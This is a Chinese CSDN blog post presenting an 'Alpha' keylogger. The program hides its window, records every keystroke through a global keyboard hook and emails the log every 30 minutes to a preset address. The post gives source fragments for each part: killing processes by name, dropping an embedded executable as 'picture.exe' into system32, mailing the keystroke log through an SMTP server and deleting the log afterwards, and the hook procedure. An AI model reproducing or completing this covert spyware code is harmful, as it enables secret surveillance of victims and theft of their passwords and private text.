键盘记录Alpha版

最新推荐文章于 2014-03-17 17:58:14 发布
最新推荐文章于 2014-03-17 17:58:14 发布
阅读量6.5k 收藏 1
点赞数
分类专栏: Windows系统编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/singwhatiwanna/article/details/8857818
版权

功能如下,运行后自动隐藏界面,然后记录键盘,每隔30分钟会向预先设定的邮箱发一封记录邮件,功能还不是很完善。我就不把程序放上来了,就贴几段源代码吧。

1.TerminateProcessByName   //根据进程名称结束指定进程

void TerminateProcessByName(CString processName)

{

HANDLE snapShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//--------------------------------------

//查询进程

//--------------------------------------
PROCESSENTRY32  processInfo;

CString strProcessName= "";

DWORD  nProcessID=0;

HANDLE processHandle;

int nProcessTerminate=0;

processInfo.dwSize=sizeof(PROCESSENTRY32);

//获取第一个进程

BOOL status=Process32First(snapShot,&processInfo);

while(status)

{

//获取进程名字

strProcessName = processInfo.szExeFile;

//查询比较是否为要结束的进程

if(processName.CompareNoCase(strProcessName)==0)

{

//获取进程ID

nProcessID=processInfo.th32ProcessID;

processHandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, nProcessID );

if(processHandle==NULL)

{

return;

}

//结束一个进程

TerminateProcess(processHandle,0);

}

//获取下一个进程

status=Process32Next(snapShot,&processInfo);

}

}


2. 实现指定资源文件的拷贝  //这段代码解决了全局钩子必须使用动态链接库这个问题

HANDLE hFile = CreateFile(
"C:\\WINDOWS\\system32\\picture.exe",
 GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); 

HRSRC hrsrc=FindResource(NULL,MAKEINTRESOURCE(141),"Exe");

LPCVOID lp=LockResource(LoadResource(NULL,hrsrc));

DWORD fileSize=SizeofResource(NULL,hrsrc);

WriteFile(hFile,lp,fileSize,&writeSize,NULL);

CloseHandle(hFile);

3.SendMyMail   //发送邮件

BOOL _declspec(dllimport) WINAPI SendMail( 

 LPCSTR smtpserver,

 LPCSTR user,

 LPCSTR password,

 LPCSTR mailfrom,

 LPCSTR mailto,

 LPCSTR subject,

 LPCSTR msgbody

 );

BOOL _declspec(dllimport) WINAPI GetSmtpError(LPSTR strerrmsg);

void SendMyMail()

{

FILE* f=fopen("C:\\WINDOWS\\system32\\logforkeyboard.db","a+");

char buffer[2002];

fread(buffer,sizeof(char),2000,f);

fclose(f);

char* stserver="smtp.163.com";

char* user="***********";

char* pwd="**********";

char* sender="***********";

char* receiver="********@qq.com";

char* title="The log for keyboard";

char* body=buffer;

SendMail(stserver,user,pwd,sender,receiver,title,body);

remove("C:\\WINDOWS\\system32\\logforkeyboard.db");

}

4.KeyboardProc  //关键的函数,键盘记录

LRESULT CALLBACK KeyboardProc(

 int code,       // hook code

 WPARAM wParam,  // virtual-key code

 LPARAM lParam   // keystroke-message information

 )

{

if('U'==wParam&&(1==(lParam>>29 & 1)))

{

SendMessage(g_hWnd,WM_CLOSE,0,0);

UnhookWindowsHookEx(g_hKeyboard);

}

if (lParam& 0x40000000)

{

return CallNextHookEx(g_hKeyboard,code,wParam,lParam);

}

else

{

char c=getKeyText(wParam);

WriteToDbFile(c);

}

return CallNextHookEx(g_hKeyboard,code,wParam,lParam);

}
singwhatiwanna
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Gh0st1.0 Alpha 脱壳
03-20
4. **功能模块**:识别出Gh0st1.0 Alpha包含的各种功能模块,如键盘记录、屏幕截图、文件操作等,以了解其全部攻击能力。 5. **反分析技术**:检查是否有反调试或反虚拟机的机制,这些机制可能阻碍分析过程。 6. *...
Radmin_3.4_完美破解
01-07
•完全支持显示动画和阿尔法alpha-blended)远程电脑光标。 •关机连接模式。 •Telnet 模式。 •Radmin Server 仅作为一个服务来运行。 •提供 Radmin 连接的无限号码簿,资源管理器风格的界面,文件夹以及拖放...
【Unity3D自学记录】Unity3D之KeyCode键值
虚拟世界
03-17 2877
Backspace 退格键  Delete  Delete键  TabTab键  Clear  Clear键  Return  回车键  Pause  暂停键  Escape  ESC键  Space  空格键  Keypad0  小键盘0  Keypad1  小键盘1  Keypad2  小键盘2  Keypad3  小键盘3  Keypad4  小键盘4  Keypa
用电脑时一些特殊符号的打法
liu_lanmao的专栏
07-16 594
打字时有时候不知道一些特殊符号的打法,其实非常简单。还有一些只按一些数字键就可,自己试一试
打印出键盘上的所有数字、大小写字母和标准符号
web开发自学
10-15 438
import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; public class Print { public static void mai...
Midi木键盘-项目开发
03-30
5. midi_alpha_berru_face_J907vdkn9H.png和midi_alpha_berru_iCIZTc9rCw.png:这两个文件可能是键盘布局图或特定键位功能的示意图。 6. capture_decran_2021-01-27_110109_n7tlhqvgkp.png:屏幕截图,可能展示了在...
ios开发记录
08-06
状态栏20键盘高度216导航44 最少2位 补0 // UIColor *color2 = [[UIColor alloc] initWithRed:0 green:1 blue:0 alpha:1]; // button setTitle:@"点我吧" forState:UIControlStateNormal]; // [button addTarget:...
通过手机来实现远程关机的思想
singwhatiwanna
04-27 8561
我说一下我的思想:先写一个关机程序,这个程序一直访问网络上的一个文件,这个文件是我们事先准备好的,里面有命令字符串,程序读取这个文件的内容,如果发现是关机命令,就执行关机命令,这样就可以通过一个网络文件来向远程计算机发命令了。想要通过手机来往网络文件里写命令,最好不过的是采用网页的形式了,只要在网站服务器上事先写好一个网页,该网页可以往配置文件里写命令,这样就好了。网页可以采用JSP、PHP、as
远程监控程序的实现
singwhatiwanna
04-27 6213
本程序能实现监控的功能,由于我不想记录太多的信息,所以简化了其中的功能。程序中主要记录当前的进程列表和活动窗口的标题,每小时记录一次,每一天向预先设定的邮箱中发一封邮件,典型的邮件内容如下: 2011-03-28 12:28 当前窗口:开始 [System Process] smss.exe csrss.exe wininit.exe winlogon.exe services.
Appler即时通讯
singwhatiwanna
04-27 4544
简介: 本程序为一个基于TCP和UDP的网络通信程序,初步目的是用于局域网的通信。程序中采用了互联网通信的思想,因此可以很容易的扩展为互联网通信程序,但是由于互联网通信的复杂性,本程序目前只能用了局域网通信,可以这么说,本程序实际上是QQ和飞鸽的综合,即用QQ的模式来实现飞鸽。 本程序分为服务器和客户端(服务器和客户端在同一个程序上面),能够实现局域网内的文字和视频语音聊天以及文件传输。
远程线程注入
singwhatiwanna
04-27 3826
// 远程插入线程 // char szDllFullPath[] DLL文件完整路径. // DWORD dwRemoteProcessID 要插入的进程ID号 // 返回: TRUE 插入进程成功 // FALSE 失败 BOOL InjectDll(char szDllFullPath[],DWORD dwRemoteProcessID) { HANDLE
VC++中采用ADO操作SQL数据库
singwhatiwanna
04-27 3275
// ADOConn.cpp: implementation of the ADOConn class. // ////////////////////////////////////////////////////////////////////// #include "stdafx.h" #include "ADOConn.h" #ifdef _DEBUG #undef T
sayhi setup Alpha
singwhatiwanna
04-27 2953
用vc写的一个简易的安装程序,实现的功能比较简单,但是也完成了基本的安装功能,例如注册表,开始菜单,桌面快捷方式,卸载。。。。。。没有起名字,就叫sayhi setup吧。 点击下载sayhi setup 1.0         附上几张截图:
全国计算机三级(网络技术)做题技巧
07-22
全国计算机三级(网络技术)做题技巧
记录 cocos 开发问题 ,微信 wx.xxx函数 报找不到名称“wx”
最新发布
07-22
wx api 文件
c语言编写程序,将已知文件alpha.txt中存储了一组整数,从键盘上输入一个整数,在文件中查找该数据。如果找到,输出该数据的位置,否则输出未找到信息。
05-24
以下是一个基本的实现: ...然后从键盘上读取需要查找的整数num,接着程序逐个读取文件中的整数,如果找到了与num相等的数,则记录该数在文件中的位置并跳出循环。最后根据position的值输出相应信息,并关闭文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

singwhatiwanna

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值